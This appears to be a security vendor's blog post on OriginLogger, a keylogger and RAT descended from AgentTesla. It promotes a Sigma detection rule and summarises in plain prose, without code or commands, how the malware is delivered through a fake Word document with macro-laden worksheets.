OriginLogger Malware Detection: Researchers Shed Light on AgentTesla’s Successor

The malware called OriginLogger is advertised as a compelling RAT with a user-friendly web panel, smart logger, and a powerful keyboard hook. OriginLogger malware description also details the multiple language support feature. The malware strain is designed to run on Windows-based operating systems.

The OriginLogger RAT was recommended as a substitution for another infamous keystroke logger tagged AgentTesla when it was eliminated from the market of legal software due to obvious legal issues.

Detect OriginLogger Malware

To detect malicious files planted in your system by OriginLogger operators, utilize the  IOC-based Sigma rule created by Threat Bounty developer Chayanin Khawsanit:

Detected Dropper activity Lead to Agent Tesla Infection (via file_event)

This detection is available for 26 SIEM, EDR & XDR platforms, aligned with MITRE ATT&CK® framework v.10, addressing the Resource Development and Execution tactics with Develop Capabilities (T1587) and User Execution (T1204) techniques.

Threat Hunters, SOC and CTI Analysts, and Detection Engineers can save time and reduce risks by automating their SOC routine and boosting threat hunting operations with effortless Detection-as-Code content deployment and management. SOC Prime’s field-proven solutions, such as Uncoder CTI, allow you to focus on incident response and other high-priority activities rather than spending volumes of time on detection content research & coding.

Explore Detections  

OriginLogger Malware Analysis

OriginLogger traces its roots back to a spyware dubbed AgentTesla. According to an in-depth research published by Unit 42, OriginLogger is a variant of Agent Tesla – to be more precise, its third released version, aka “AgentTeslav3”. Agent Tesla, a commercial keylogger and remote access trojan built using .NET, has been in operation since 2014, enabling criminal hackers to obtain remote access to breached networks and steal sensitive data.

Both keyloggers are distributed via a fake Microsoft Word document that includes a copy of a random German citizen’s passport, a picture of a credit card, and a number of Excel Worksheets. The worksheets carry a VBA macro that fetches and runs the contents of a remote server’s HTML page via MSHTA. The infection chain will result in victim’s device infection with an obfuscated PowerShell code and two encoded binaries. The malware will proceed to harvest the target’s interactions with a compromised device.

Browse through the vast library of detection content to find other relevant algorithms and detect whether your system is infected with malicious files. Are you a professional threat hunter striving to share your expertise with the world’s largest cybersecurity community? Join our crowdsourcing initiative for continuous rewards and recognition with the Threat Bounty program.